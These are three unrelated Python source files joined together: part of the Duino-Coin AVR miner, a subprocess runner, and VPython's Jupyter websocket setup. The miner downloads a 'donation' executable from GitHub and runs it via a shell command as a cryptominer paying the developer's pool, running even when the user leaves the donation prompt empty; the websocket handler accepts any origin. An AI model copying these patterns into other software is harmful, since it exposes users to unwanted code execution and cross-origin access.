            + get_string("wallet")
            + Fore.RESET
            + get_string("register_warning"))
        username = input(
            Style.RESET_ALL
            + Fore.YELLOW
            + get_string("ask_username")
            + Fore.RESET
            + Style.BRIGHT)
        print(Style.RESET_ALL
              + Fore.YELLOW
              + get_string("ports_message"))
        portlist = serial.tools.list_ports.comports()
        for port in portlist:
            print(Style.RESET_ALL
                  + Style.BRIGHT
                  + Fore.RESET
                  + "  "
                  + str(port))
        print(Style.RESET_ALL
              + Fore.YELLOW
              + get_string("ports_notice"))
        # Collect one or more serial ports as a comma-separated string.
        avrport = ""
        while True:
            avrport += input(
                Style.RESET_ALL
                + Fore.YELLOW
                + get_string("ask_avrport")
                + Fore.RESET
                + Style.BRIGHT)
            confirmation = input(
                Style.RESET_ALL
                + Fore.YELLOW
                + get_string("ask_anotherport")
                + Fore.RESET
                + Style.BRIGHT)
            if confirmation == "y" or confirmation == "Y":
                avrport += ","
            else:
                break
        rig_identifier = input(
            Style.RESET_ALL
            + Fore.YELLOW
            + get_string("ask_rig_identifier")
            + Fore.RESET
            + Style.BRIGHT)
        if rig_identifier == "y" or rig_identifier == "Y":
            rig_identifier = input(
                Style.RESET_ALL
                + Fore.YELLOW
                + get_string("ask_rig_name")
                + Fore.RESET
                + Style.BRIGHT)
        else:
            rig_identifier = "None"
        donation_level = "0"
        if osname == "nt" or osname == "posix":
            donation_level = input(
                Style.RESET_ALL
                + Fore.YELLOW
                + get_string("ask_donation_level")
                + Fore.RESET
                + Style.BRIGHT)
        # Check whether donation_level is correct: strip non-digits, default
        # empty input to 1, and clamp to the 0..5 range.
        donation_level = sub(r"\D", "", donation_level)
        if donation_level == '':
            donation_level = 1
        if float(donation_level) > int(5):
            donation_level = 5
        if float(donation_level) < int(0):
            donation_level = 0
        # Format data
        config["arduminer"] = {
            "username": username,
            "avrport": avrport,
            "donate": donation_level,
            "language": lang,
            "identifier": rig_identifier,
            "debug": "n"}
        # Write data to file
        with open(str(RESOURCES_DIR)
                  + "/Miner_config.cfg", "w") as configfile:
            config.write(configfile)
        avrport = avrport.split(",")
        print(Style.RESET_ALL + get_string("config_saved"))
    else:  # If config already exists, load from it
        config.read(str(RESOURCES_DIR) + "/Miner_config.cfg")
        username = config["arduminer"]["username"]
        avrport = config["arduminer"]["avrport"]
        avrport = avrport.split(",")
        donation_level = config["arduminer"]["donate"]
        debug = config["arduminer"]["debug"]
        rig_identifier = config["arduminer"]["identifier"]
def greeting():
    """Print the startup banner and download the donation executable if needed.

    The greeting line depends on the current hour. Fix: the original declared
    `global greeting` and assigned a string to it, rebinding this function's
    own name — a second call would have crashed. A local is used instead;
    nothing else reads that global.
    """
    print(Style.RESET_ALL)
    current_hour = strptime(ctime(time())).tm_hour
    if current_hour < 12:
        greeting_msg = get_string("greeting_morning")
    elif current_hour == 12:
        greeting_msg = get_string("greeting_noon")
    elif current_hour > 12 and current_hour < 18:
        greeting_msg = get_string("greeting_afternoon")
    elif current_hour >= 18:
        greeting_msg = get_string("greeting_evening")
    else:
        greeting_msg = get_string("greeting_back")
    # Startup message
    print(
        Style.DIM
        + Fore.MAGENTA
        + " ‖ "
        + Fore.YELLOW
        + Style.BRIGHT
        + get_string("banner")
        + Style.RESET_ALL
        + Fore.MAGENTA
        + " (v"
        + str(MINER_VER)
        + ") "
        + Fore.RESET
        + "2019-2021")
    print(
        Style.DIM
        + Fore.MAGENTA
        + " ‖ "
        + Style.NORMAL
        + Fore.MAGENTA
        + "https://github.com/revoxhere/duino-coin")
    print(
        Style.DIM
        + Fore.MAGENTA
        + " ‖ "
        + Style.NORMAL
        + Fore.RESET
        + get_string("avr_on_port")
        + Style.BRIGHT
        + Fore.YELLOW
        + " ".join(avrport))
    if osname == "nt" or osname == "posix":
        print(
            Style.DIM
            + Fore.MAGENTA
            + " ‖ "
            + Style.NORMAL
            + Fore.RESET
            + get_string("donation_level")
            + Style.BRIGHT
            + Fore.YELLOW
            + str(donation_level))
    print(
        Style.DIM
        + Fore.MAGENTA
        + " ‖ "
        + Style.NORMAL
        + Fore.RESET
        + get_string("algorithm")
        + Style.BRIGHT
        + Fore.YELLOW
        + "DUCO-S1A @ AVR diff")
    print(
        Style.DIM
        + Fore.MAGENTA
        + " ‖ "
        + Style.NORMAL
        + Fore.RESET
        + get_string("rig_identifier")
        + Style.BRIGHT
        + Fore.YELLOW
        + rig_identifier)
    print(
        Style.DIM
        + Fore.MAGENTA
        + " ‖ "
        + Style.NORMAL
        + Fore.RESET
        + str(greeting_msg)
        + ", "
        + Style.BRIGHT
        + Fore.YELLOW
        + str(username)
        + "!\n")
    if osname == "nt":
        # Initial miner executable section
        if not Path(RESOURCES_DIR + "/donate_executable.exe").is_file():
            debug_output(
                "OS is Windows, downloading developer donation executable")
            url = ("https://github.com/"
                   + "revoxhere/"
                   + "duino-coin/blob/useful-tools/"
                   + "donateExecutableWindows.exe?raw=true")
            r = requests.get(url)
            with open(RESOURCES_DIR + "/donate_executable.exe", "wb") as f:
                f.write(r.content)
    elif osname == "posix":
        # Initial miner executable section
        if not Path(RESOURCES_DIR + "/donate_executable").is_file():
            debug_output(
                "OS is *nix, downloading developer donation executable")
            url = ("https://github.com/"
                   + "revoxhere/"
                   + "duino-coin/blob/useful-tools/"
                   + "donateExecutableLinux?raw=true")
            r = requests.get(url)
            with open(RESOURCES_DIR + "/donate_executable", "wb") as f:
                f.write(r.content)
def restart_miner():
    """Stop the donation subprocess (if any) and re-exec this miner."""
    try:
        if donator_running:
            donateExecutable.terminate()
    except Exception as e:
        pretty_print(
            "sys0",
            "Error closing donate executable"
            + Style.NORMAL
            + Fore.RESET
            + " (" + str(e) + ")",
            "error")
    try:
        # Replace the current process with a fresh interpreter run.
        execl(sys.executable, sys.executable, *sys.argv)
    except Exception as e:
        pretty_print(
            "sys0",
            "Error restarting miner"
            + " (" + str(e) + ")",
            "error")
def donate():
    """Launch the developer-donation miner, or warn when donating is disabled."""
    global donation_level
    global donator_running
    global donateExecutable
    if osname == "nt":
        cmd = (
            "cd "
            + RESOURCES_DIR
            + "& donate_executable.exe "
            + "-o stratum+tcp://xmg.minerclaim.net:7008 "
            + "-u revox.donate "
            + "-p x -s 4 -e ")
    elif osname == "posix":
        cmd = (
            "cd "
            + RESOURCES_DIR
            + "&& chmod +x donate_executable "
            + "&& ./donate_executable "
            + "-o stratum+tcp://xmg.minerclaim.net:7008 "
            + "-u revox.donate "
            + "-p x -s 4 -e ")
    level = int(donation_level)
    if level <= 0:
        pretty_print(
            "sys0",
            Fore.YELLOW
            + get_string("free_network_warning")
            + get_string("donate_warning")
            + Fore.GREEN
            + "https://duinocoin.com/donate"
            + Fore.YELLOW
            + get_string("learn_more_donate"),
            "warning")
        sleep(5)
    elif not donator_running:
        if 1 <= level <= 5:
            # Donated hash percentage is ten times the configured level.
            cmd += str(level * 10)
        if level > 0:
            debug_output(get_string("starting_donation"))
            donator_running = True
            # Launch CMD as subprocess
            donateExecutable = Popen(
                cmd, shell=True, stderr=DEVNULL)
            pretty_print(
                "sys0",
                get_string("thanks_donation"),
                "warning")
def init_rich_presence():
    # Initialize Discord rich presence
    # Stores the client in the module-level RPC for update_rich_presence().
    global RPC
    try:
        RPC = Presence(808056068113563701)
        RPC.connect()
        debug_output("Discord rich presence initialized")
    except Exception:
        # Discord not launched
        pass
def update_rich_presence():
    """Refresh the Discord rich presence card every 15 seconds, forever."""
    start_stamp = int(time())
    while True:
        try:
            share_text = ("Acc. shares: "
                          + str(shares[0])
                          + "/"
                          + str(shares[0] + shares[1]))
            RPC.update(
                details="Hashrate: " + str(hashrate) + " H/s",
                start=start_stamp,
                state=share_text,
                large_image="ducol",
                large_text="Duino-Coin, "
                + "a coin that can be mined with almost everything, "
                + "including AVR boards",
                buttons=[
                    {"label": "Learn more",
                     "url": "https://duinocoin.com"},
                    {"label": "Discord Server",
                     "url": "https://discord.gg/k48Ht5y"}])
        except Exception:
            # Discord not running; try again next cycle.
            pass
        # 15 seconds to respect Discord's rate limit
        sleep(15)
def pretty_print(message_type, message, state):
    """Print a message in the DUCO "standard" format.

    message_type picks the badge colour ("net…" blue, "usb…" magenta,
    "sys…" green); state picks the text colour ("success" green,
    "warning" yellow, anything else red). Thread-safe via thread_lock.
    """
    # Usb/net/sys background. Default to green so an unknown prefix cannot
    # raise UnboundLocalError (the original left `background` unset then).
    if message_type.startswith("net"):
        background = Back.BLUE
    elif message_type.startswith("usb"):
        background = Back.MAGENTA
    else:
        background = Back.GREEN
    # Text color
    if state == "success":
        color = Fore.GREEN
    elif state == "warning":
        color = Fore.YELLOW
    else:
        color = Fore.RED
    with thread_lock:
        print(Style.RESET_ALL
              + Fore.WHITE
              + now().strftime(Style.DIM + "%H:%M:%S ")
              + Style.BRIGHT
              + background
              + " "
              + message_type
              + " "
              + Back.RESET
              + color
              + Style.BRIGHT
              + message
              + Style.NORMAL
              + Fore.RESET)
def mine_avr(com):
    """Worker-thread entry point: drive one AVR board on serial port `com`.

    Loops forever: fetch the pool address from GitHub, connect, request a
    job, hand it to the AVR over serial, submit the result and report the
    server's GOOD/BLOCK/rejected feedback.
    """
    # Mining section
    global hashrate
    global server_ip
    global server_port
    errorCounter = 0
    while True:
        # Grab server IP and port
        while True:
            try:
                # Use request to grab data from raw github file
                res = requests.get(server_ip_file, data=None)
                if res.status_code == 200:
                    # Read content and split into lines
                    content = (res.content.decode().splitlines())
                    server_ip = content[0]  # Line 1 = pool address
                    server_port = content[1]  # Line 2 = pool port
                    debug_output(
                        "Retrieved pool IP: "
                        + server_ip
                        + ":"
                        + str(server_port))
                    # Connect to the server
                    soc = connect()
                    break
            except Exception as e:
                # If there was an error with grabbing data from GitHub
                pretty_print(
                    "net"
                    + str(''.join(filter(str.isdigit, com))),
                    get_string("data_error")
                    + Style.NORMAL
                    + Fore.RESET
                    + " (git err: "
                    + str(e)
                    + ")",
                    "error")
                debug_output("GitHub error: " + str(e))
                sleep(10)
        while True:
            try:
                # Connect to the serial port
                # comConn = connectToAVR(com)
                pretty_print(
                    "sys"
                    + str(''.join(filter(str.isdigit, com))),
                    get_string("mining_start")
                    + Style.NORMAL
                    + Fore.RESET
                    + get_string("mining_algorithm")
                    + str(com)
                    + ")",
                    "success")
                break
            except Exception as e:
                pretty_print(
                    "usb"
                    + str(''.join(filter(str.isdigit, com))),
                    get_string("mining_avr_connection_error")
                    + Style.NORMAL
                    + Fore.RESET
                    + " (avr connection err: "
                    + str(e)
                    + ")",
                    "error")
                sleep(5)
        # Job/share loop: request a job, compute on the AVR, submit, repeat.
        while True:
            while True:
                try:
                    # Send job request
                    debug_output("Requested job from the server")
                    soc.sendall(
                        bytes(
                            "JOB,"
                            + str(username)
                            + ",AVR",
                            encoding="utf8"))
                    # Retrieve work
                    ready = select.select([soc], [], [], SOCKET_TIMEOUT)
                    if ready[0]:
                        job = soc.recv(100).decode()
                        # Split received data
                        job = job.rstrip("\n").split(",")
                        # Check if username is correct
                        if job[1] == "This user doesn't exist":
                            pretty_print(
                                "net"
                                + str(''.join(filter(str.isdigit, com))),
                                get_string("mining_user")
                                + str(username)
                                + get_string("mining_not_exist")
                                + Style.NORMAL
                                + Fore.RESET
                                + get_string("mining_not_exist_warning"),
                                "error")
                            sleep(10)
                        # If job was received, continue
                        elif job[0] and job[1] and job[2]:
                            diff = int(job[2])
                            debug_output("Job received: " + " ".join(job))
                            break
                except Exception as e:
                    pretty_print(
                        "net"
                        + str(''.join(filter(str.isdigit, com))),
                        get_string("connecting_error")
                        + Style.NORMAL
                        + Fore.RESET
                        + " (net err: "
                        + str(e)
                        + ")",
                        "error")
                    debug_output("Connection error: " + str(e))
                    sleep(10)
                    restart_miner()
            while True:
                # Hand the job to the AVR and read back result/time/chipID.
                while True:
                    with Serial(com,
                                baudrate=115200,
                                timeout=AVR_TIMEOUT) as ser:
                        while True:
                            ser.write(bytes(str(job[0]
                                                + "," + job[1]
                                                + "," + job[2]
                                                + ","),
                                            encoding="utf-8"))
                            result = ser.readline().decode()
                            result = result.rstrip("\n").split(",")
                            try:
                                if result[0] and result[1]:
                                    break
                            except:
                                pass
                    try:
                        debug_output(
                            "Received result (" + str(result[0]) + ")")
                        debug_output("Received time (" + str(result[1]) + ")")
                        ducos1result = result[0]
                        # Convert AVR time to seconds
                        computetime = round(int(result[1]) / 1000000, 3)
                        # Calculate hashrate
                        hashrate = round(
                            int(result[0]) * 1000000 / int(result[1]), 2)
                        debug_output(
                            "Calculated hashrate (" + str(hashrate) + ")")
                        try:
                            chipID = result[2]
                            debug_output(
                                "Received chip ID (" + str(result[2]) + ")")
                            # Check if user is using the latest Arduino code
                            # This is not used yet anywhere, but will soon be
                            # added as yet another a security measure in the
                            # Kolka security system for identifying AVR boards
                            if not chipID.startswith("DUCOID"):
                                raise Exception("Wrong chipID string")
                        except Exception:
                            pretty_print(
                                "usb"
                                + str(''.join(filter(str.isdigit, com))),
                                " Possible incorrect chipID!"
                                + Style.NORMAL
                                + Fore.RESET
                                + " This will cause problems with the future"
                                + " release of Kolka security system",
                                "warning")
                            chipID = "None"
                        break
                    except Exception as e:
                        pretty_print(
                            "usb"
                            + str(''.join(filter(str.isdigit, com))),
                            get_string("mining_avr_connection_error")
                            + Style.NORMAL
                            + Fore.RESET
                            + " (err splitting avr data: "
                            + str(e)
                            + ")",
                            "error")
                        debug_output("Error splitting data: " + str(e))
                        sleep(1)
                try:
                    # Send result to the server
                    soc.sendall(
                        bytes(
                            str(ducos1result)
                            + ","
                            + str(hashrate)
                            + ",Official AVR Miner (DUCO-S1A) v"
                            + str(MINER_VER)
                            + ","
                            + str(rig_identifier)
                            + ","
                            + str(chipID),
                            encoding="utf8"))
                except Exception as e:
                    pretty_print(
                        "net"
                        + str(''.join(filter(str.isdigit, com))),
                        get_string("connecting_error")
                        + Style.NORMAL
                        + Fore.RESET
                        + " ("
                        + str(e)
                        + ")",
                        "error")
                    debug_output("Connection error: " + str(e))
                    sleep(5)
                    restart_miner()
                while True:
                    try:
                        responsetimetart = now()
                        # Get feedback
                        ready = select.select(
                            [soc], [], [], SOCKET_TIMEOUT)
                        if ready[0]:
                            feedback = soc.recv(48).decode().rstrip("\n")
                            responsetimestop = now()
                            # Measure server ping
                            timeDelta = (responsetimestop -
                                         responsetimetart).microseconds
                            ping = round(timeDelta / 1000)
                            debug_output("Successfully retrieved feedback: "
                                         + str(feedback)
                                         + " with ping: "
                                         + str(ping))
                            break
                    except Exception as e:
                        pretty_print(
                            "net"
                            + str(''.join(filter(str.isdigit, com))),
                            get_string("connecting_error")
                            + Style.NORMAL
                            + Fore.RESET
                            + " (err parsing response: "
                            + str(e)
                            + ")",
                            "error")
                        debug_output("Error parsing response: "
                                     + str(e)
                                     + ", restarting miner")
                        sleep(1)
                        restart_miner()
                if feedback == "GOOD":
                    # If result was correct
                    shares[0] += 1
                    title(
                        get_string("duco_avr_miner")
                        + str(MINER_VER)
                        + ") - "
                        + str(shares[0])
                        + "/"
                        + str(shares[0] + shares[1])
                        + get_string("accepted_shares"))
                    with thread_lock:
                        print(
                            Style.RESET_ALL
                            + Fore.WHITE
                            + now().strftime(Style.DIM + "%H:%M:%S ")
                            + Style.BRIGHT
                            + Back.MAGENTA
                            + Fore.RESET
                            + " usb"
                            + str(''.join(filter(str.isdigit, com)))
                            + " "
                            + Back.RESET
                            + Fore.GREEN
                            + " ✓"
                            + get_string("accepted")
                            + Fore.RESET
                            + str(int(shares[0]))
                            + "/"
                            + str(int(shares[0] + shares[1]))
                            + Fore.YELLOW
                            + " ("
                            + str(int((shares[0]
                                       / (shares[0] + shares[1]) * 100)))
                            + "%)"
                            + Style.NORMAL
                            + Fore.RESET
                            + " ∙ "
                            + str("%01.3f" % float(computetime))
                            + "s"
                            + Style.NORMAL
                            + " ∙ "
                            + Fore.BLUE
                            + Style.BRIGHT
                            + str(round(hashrate))
                            + " H/s"
                            + Style.NORMAL
                            + Fore.RESET
                            + " @ diff "
                            + str(diff)
                            + " ∙ "
                            + Fore.CYAN
                            + "ping "
                            + str("%02.0f" % int(ping))
                            + "ms")
                elif feedback == "BLOCK":
                    # If block was found
                    shares[0] += 1
                    title(
                        get_string("duco_avr_miner")
                        + str(MINER_VER)
                        + ") - "
                        + str(shares[0])
                        + "/"
                        + str(shares[0] + shares[1])
                        + get_string("accepted_shares"))
                    with thread_lock:
                        print(
                            Style.RESET_ALL
                            + Fore.WHITE
                            + now().strftime(Style.DIM + "%H:%M:%S ")
                            + Style.BRIGHT
                            + Back.MAGENTA
                            + Fore.RESET
                            + " usb"
                            + str(''.join(filter(str.isdigit, com)))
                            + " "
                            + Back.RESET
                            + Fore.CYAN
                            + " ✓"
                            + get_string("block_found")
                            + Fore.RESET
                            + str(int(shares[0]))
                            + "/"
                            + str(int(shares[0] + shares[1]))
                            + Fore.YELLOW
                            + " ("
                            + str(int((shares[0]
                                       / (shares[0] + shares[1]) * 100)))
                            + "%)"
                            + Style.NORMAL
                            + Fore.RESET
                            + " ∙ "
                            + str("%01.3f" % float(computetime))
                            + "s"
                            + Style.NORMAL
                            + " ∙ "
                            + Fore.BLUE
                            + Style.BRIGHT
                            + str(int(hashrate))
                            + " H/s"
                            + Style.NORMAL
                            + Fore.RESET
                            + " @ diff "
                            + str(diff)
                            + " ∙ "
                            + Fore.CYAN
                            + "ping "
                            + str("%02.0f" % int(ping))
                            + "ms")
                else:
                    # If result was incorrect
                    shares[1] += 1
                    title(
                        get_string("duco_avr_miner")
                        + str(MINER_VER)
                        + ") - "
                        + str(shares[0])
                        + "/"
                        + str(shares[0] + shares[1])
                        + get_string("accepted_shares"))
                    with thread_lock:
                        print(
                            Style.RESET_ALL
                            + Fore.WHITE
                            + now().strftime(Style.DIM + "%H:%M:%S ")
                            + Style.BRIGHT
                            + Back.MAGENTA
                            + Fore.RESET
                            + " usb"
                            + str(''.join(filter(str.isdigit, com)))
                            + " "
                            + Back.RESET
                            + Fore.RED
                            + " ✗"
                            + get_string("rejected")
                            + Fore.RESET
                            + str(int(shares[0]))
                            + "/"
                            + str(int(shares[0] + shares[1]))
                            + Fore.YELLOW
                            + " ("
                            + str(int((shares[0]
                                       / (shares[0] + shares[1]) * 100)))
                            + "%)"
                            + Style.NORMAL
                            + Fore.RESET
                            + " ∙ "
                            + str("%01.3f" % float(computetime))
                            + "s"
                            + Style.NORMAL
                            + " ∙ "
                            + Fore.BLUE
                            + Style.BRIGHT
                            + str(int(hashrate))
                            + " H/s"
                            + Style.NORMAL
                            + Fore.RESET
                            + " @ diff "
                            + str(diff)
                            + " ∙ "
                            + Fore.CYAN
                            + "ping "
                            + str("%02.0f" % int(ping))
                            + "ms")
                break
if __name__ == "__main__":
    # Colorama
    init(autoreset=True)
    # Window title
    title(get_string("duco_avr_miner") + str(MINER_VER) + ")")
    try:
        # Load config file or create new one
        load_config()
        debug_output("Config file loaded")
    except Exception as e:
        pretty_print(
            "sys0",
            get_string("load_config_error")
            + RESOURCES_DIR
            + get_string("load_config_error_warning")
            + Style.NORMAL
            + Fore.RESET
            + " ("
            + str(e)
            + ")",
            "error")
        debug_output("Error reading configfile: " + str(e))
        sleep(10)
        _exit(1)
    try:
        # Display greeting message
        greeting()
        debug_output("greeting displayed")
    except Exception as e:
        debug_output("Error displaying greeting message: " + str(e))
    try:
        # Start donation thread
        donate()
    except Exception as e:
        debug_output("Error launching donation thread: " + str(e))
    try:
        # Launch avr duco mining threads (one thread per configured port)
        for port in avrport:
            thrThread(
                target=mine_avr,
                args=(port,)).start()
    except Exception as e:
        debug_output("Error launching AVR thead(s): " + str(e))
    try:
        # Discord rich presence threads
        init_rich_presence()
        thrThread(
            target=update_rich_presence).start()
    except Exception as e:
        debug_output("Error launching Discord RPC thead: " + str(e))
|
ProcessRunner.py | import subprocess
from subprocess import Popen, PIPE
import errno
import signal
import threading
import time
import shlex
from mtm.ioc.Inject import Inject
from queue import Queue, Empty
class ResultType:
    # Enum-like result codes returned by ProcessRunner methods.
    Success = 1   # process exited with status 0
    Error = 2     # process exited with a non-zero status
    TimedOut = 3  # process was force-killed after the timeout elapsed
class ProcessRunner:
    """Runs external processes, optionally with a timeout, logging their output."""

    _log = Inject('Logger')

    def execNoWait(self, vals, startDir):
        """Start a process and return immediately without waiting for it.

        vals: argument list passed to Popen.
        startDir: working directory for the child, or None for the current one.
        """
        params = {}
        if startDir is not None:
            params['cwd'] = startDir
        Popen(vals, **params)

    def waitForProcessOrTimeout(self, commandVals, seconds, startDir = None):
        """Run a command, stream its output to the log, and enforce a timeout.

        Returns ResultType.TimedOut if the process was killed after `seconds`,
        ResultType.Error for a non-zero exit status, ResultType.Success otherwise.
        """
        params = {}
        params['stdout'] = subprocess.PIPE
        # Merge stderr into stdout so a single reader thread sees everything.
        params['stderr'] = subprocess.STDOUT
        if startDir is not None:
            params['cwd'] = startDir
        proc = Popen(commandVals, **params)

        # TODO - clean this up so there's only one thread, then
        # do the timeout logic on the main thread
        timeout = KillProcessThread(seconds, proc.pid)
        timeout.run()

        def enqueueOutput(out, queue):
            # Reader-thread body: push each output line onto the queue until EOF.
            for line in iter(out.readline, b''):
                queue.put(line)
            out.close()

        # We use a queue here instead of just calling stdout.readline() on the main thread
        # so that we can catch the KeyboardInterrupt event, and force kill the process
        queue = Queue()
        thread = threading.Thread(target = enqueueOutput, args = (proc.stdout, queue))
        thread.daemon = True # thread dies with the program
        thread.start()

        while True:
            try:
                try:
                    line = queue.get_nowait()
                    self._log.debug(line.decode('utf-8').rstrip())
                except Empty:
                    # Fix: Thread.isAlive() was removed in Python 3.9;
                    # is_alive() is the supported spelling.
                    if not thread.is_alive():
                        break
                    time.sleep(0.2)
            except KeyboardInterrupt as e:
                self._log.error("Detected KeyboardInterrupt - killing process...")
                timeout.forceKill()
                raise e

        resultCode = proc.wait()
        timeout.cancel()

        if timeout.timeOutOccurred:
            return ResultType.TimedOut
        if resultCode != 0:
            return ResultType.Error
        return ResultType.Success

    # Note that in this case we pass the command as a string
    # This is recommended by the python docs here when using shell = True
    # https://docs.python.org/2/library/subprocess.html#subprocess.Popen
    def execShellCommand(self, commandStr, startDir = None):
        """Run a command through the shell and log its output when it finishes.

        Output is only available after the process exits (communicate() blocks).
        Returns ResultType.Error for a non-zero exit status, Success otherwise.
        """
        params = {}
        params['stdout'] = subprocess.PIPE
        params['stderr'] = subprocess.PIPE
        params['shell'] = True
        if startDir is not None:
            params['cwd'] = startDir

        # Would be nice to get back output in real time but I can't figure
        # out a way to do this
        # This method should only be used for a few command-prompt specific
        # commands anyway so not a big loss
        proc = Popen(commandStr, **params)
        (stdoutData, stderrData) = proc.communicate()

        output = stdoutData.decode('utf-8').strip()
        errors = stderrData.decode('utf-8').strip()

        if output:
            for line in output.split('\n'):
                self._log.debug(line)

        if errors:
            self._log.error('Error occurred during command "{0}":'.format(commandStr))
            for line in errors.split('\n'):
                self._log.error(' ' + line)

        exitStatus = proc.returncode
        if exitStatus != 0:
            return ResultType.Error
        return ResultType.Success
class KillProcessThread:
    """Watchdog: force-kills a process unless cancelled within a deadline."""

    def __init__(self, seconds, pid):
        self.pid = pid
        self.timeOutOccurred = False
        self.seconds = seconds
        self.cond = threading.Condition()
        self.cancelled = False
        self.thread = threading.Thread(target=self.wait)
        # A daemon thread does not keep the interpreter alive if the main
        # thread aborts (eg. user hitting ctrl+c).
        self.thread.daemon = True

    def run(self):
        '''Begin the timeout.'''
        self.thread.start()

    def wait(self):
        '''Watchdog body: sleep until cancelled or the deadline elapses.'''
        with self.cond:
            self.cond.wait(self.seconds)
            if self.cancelled:
                return
            self.forceKill()

    def cancel(self):
        '''Cancel the timeout, if it hasn't yet occured.'''
        with self.cond:
            self.cancelled = True
            self.cond.notify()
        self.thread.join()

    def forceKill(self):
        '''Kill the watched process and record that the timeout fired.'''
        self.timeOutOccurred = True
        try:
            killCmd = shlex.split('taskkill /f /pid %i' % self.pid)
            Popen(killCmd, stdout=PIPE, stderr=PIPE)
        except OSError as e:
            # If the process is already gone, ignore the error.
            if e.errno not in (errno.EPERM, errno.ESRCH):
                raise e
|
with_notebook.py | import os
import time
from threading import Thread
from jupyter_core.paths import jupyter_data_dir
import notebook
import IPython
from IPython.display import display, Javascript
from .vpython import GlowWidget, baseObj, canvas
from .rate_control import ws_queue
from . import __version__
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import socket
import json
import asyncio
import logging
def find_free_port():
    """Return a TCP port number that was free at the time of the call.

    The probe socket is closed on exit from the ``with`` block, so the port
    is genuinely available to the caller. The original relied on CPython's
    reference counting to close the leaked socket, which is not guaranteed
    on other interpreters.
    """
    with socket.socket() as s:
        s.bind(('', 0))  # port 0 asks the OS to pick any available port
        return s.getsockname()[1]
__SOCKET_PORT = find_free_port()
try:
    # Fix: ``platform`` was referenced here without ever being imported, so
    # a NameError was raised and silently swallowed by the bare except —
    # the PyPy adjustment below could never run. Import it locally.
    import platform
    if platform.python_implementation() == 'PyPy':
        __SOCKET_PORT = 9000 + __SOCKET_PORT % 1000  # use port number between 9000 and 9999 for PyPy
except Exception:
    pass
#### Setup for Jupyter VPython
# The following file operations check whether nbextensions already has the correct files.
package_dir = os.path.dirname(__file__) # The location in site-packages of the vpython module
datacnt = len(os.listdir(package_dir+"/vpython_data")) # the number of files in the site-packages vpython data folder
libcnt = len(os.listdir(package_dir+"/vpython_libraries")) # the number of files in the site-packages vpython libraries folder
jd = jupyter_data_dir()
nbdir = jd+'/nbextensions/'
nbdata = nbdir+'vpython_data'
nblib = nbdir+'vpython_libraries'
transfer = True # need to transfer files from site-packages to nbextensions
### If JupyterLab is installed then copy vpython_data directory to static dir in Jupytarlab Application Directory
try:
    import jupyterlab
    import jupyterlab.commands
except ImportError:
    # JupyterLab is optional: skip the lab-specific install when absent.
    #logging.info("Unable to import jupyterlab")
    pass
else:
    # We have jupyterlab, is it the right version?
    # NOTE(review): this is a plain lexicographic string comparison, not a
    # semantic-version compare (e.g. '0.4.0' >= '0.35.0' holds lexically) —
    # confirm this is acceptable for the versions in the wild.
    if jupyterlab.__version__ >= '0.35.0':
        from os.path import join
        labextensions_dir = join(jupyterlab.commands.get_app_dir(), u'static')
        notebook.nbextensions.install_nbextension(path=package_dir + "/vpython_data",
                                                  nbextensions_dir=labextensions_dir,
                                                  overwrite=False,
                                                  verbose=0)
    else:
        print("Must have at least version 0.35 of JupyterLab")
# Decide whether the classic-notebook nbextensions copy is already current:
# same file counts in both folders and a matching recorded version string.
if 'nbextensions' in os.listdir(jd):
    ldir = os.listdir(nbdir)
    if ('vpython_data' in ldir and len(os.listdir(nbdata)) == datacnt and
        'vpython_libraries' in ldir and len(os.listdir(nblib)) == libcnt and
        'vpython_version.txt' in ldir):
        v = open(nbdir+'/vpython_version.txt').read()
        transfer = (v != __version__) # need not transfer files to nbextensions if correct version's files already there
if transfer:
    notebook.nbextensions.install_nbextension(path = package_dir+"/vpython_data",overwrite = True,user = True,verbose = 0)
    notebook.nbextensions.install_nbextension(path = package_dir+"/vpython_libraries",overwrite = True,user = True,verbose = 0)
    # Wait for files to be transferred to nbextensions:
    # NOTE(review): busy-wait with no timeout — if the copy fails this loop
    # never terminates; confirm install_nbextension cannot partially fail.
    libready = False
    dataready = False
    while True:
        nb = os.listdir(nbdir)
        for f in nb:
            if f == 'vpython_data':
                if len(os.listdir(nbdata)) == datacnt:
                    dataready = True
            if f == 'vpython_libraries':
                if len(os.listdir(nblib)) == libcnt:
                    libready = True
        if libready and dataready: break
    # Mark with the version number that the files have been transferred successfully:
    fd = open(nbdir+'/vpython_version.txt', 'w')
    fd.write(__version__)
    fd.close()
# Undefine any cached copies of the glow/glowcomm/jquery AMD modules, then
# require them so the browser loads the freshly installed files.
display(Javascript("""if (typeof Jupyter !== "undefined") {require.undef("nbextensions/vpython_libraries/glow.min");}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require.undef("nbextensions/vpython_libraries/glowcomm");}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require.undef("nbextensions/vpython_libraries/jquery-ui.custom.min");}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require(["nbextensions/vpython_libraries/glow.min"], function(){console.log("GLOW LOADED");});}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require(["nbextensions/vpython_libraries/glowcomm"], function(){console.log("GLOWCOMM LOADED");});}else{element.textContent = ' ';}"""))
display(Javascript("""if (typeof Jupyter !== "undefined") {require(["nbextensions/vpython_libraries/jquery-ui.custom.min"], function(){console.log("JQUERY LOADED");});}else{element.textContent = ' ';}"""))
time.sleep(1) # allow some time for javascript code above to run before attempting to setup Comm Channel
wsConnected = False
class WSHandler(tornado.websocket.WebSocketHandler):
    """Websocket endpoint feeding browser events into ws_queue."""

    def open(self):
        # Record that the browser side connected; the module-level startup
        # code polls this flag before proceeding.
        global wsConnected
        wsConnected = True

    def on_message(self, message):
        # Hand the raw event payload to the rate-control queue.
        ws_queue.put(message)

    def on_close(self):
        self.stop_tornado()

    def stop_tornado(self):
        # Ask the running IOLoop, from its own thread, to shut itself down.
        loop = tornado.ioloop.IOLoop.instance()
        loop.add_callback(loop.stop)

    def check_origin(self, origin):
        # Accept connections from any origin.
        return True
def start_server():
    """Run the tornado HTTP/websocket server on __SOCKET_PORT (blocking).

    Intended to run on a dedicated thread, so a fresh asyncio event loop is
    installed for the calling thread first.
    """
    asyncio.set_event_loop(asyncio.new_event_loop())
    app = tornado.web.Application([(r'/ws', WSHandler),])
    server = tornado.httpserver.HTTPServer(app)
    server.listen(__SOCKET_PORT)
    # Quiet tornado's per-request access logging.
    access_log = logging.getLogger('tornado.access')
    access_log.setLevel(logging.getLevelName('WARN'))
